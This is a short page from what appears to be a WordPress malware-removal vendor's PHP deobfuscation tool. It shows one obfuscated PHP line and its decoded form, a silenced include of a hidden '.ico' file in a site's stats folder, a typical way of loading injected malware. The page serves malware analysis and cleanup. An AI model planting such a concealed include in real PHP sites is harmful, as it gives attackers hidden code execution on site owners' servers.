Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @include "\057var\057www\057aom\157ru.\147a/w\145b/s\164ats\057202\061-9/\056037\141df8\061.ic\157";...



Obfuscated php code

<?php @include "\057var\057www\057aom\157ru.\147a/w\145b/s\164ats\057202\061-9/\056037\141df8\061.ic\157";

Decoded(de-Obfuscated) php code

<?php

@(include "/var/www/aomoru.ga/web/stats/2021-9/.037adf81.ico");


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.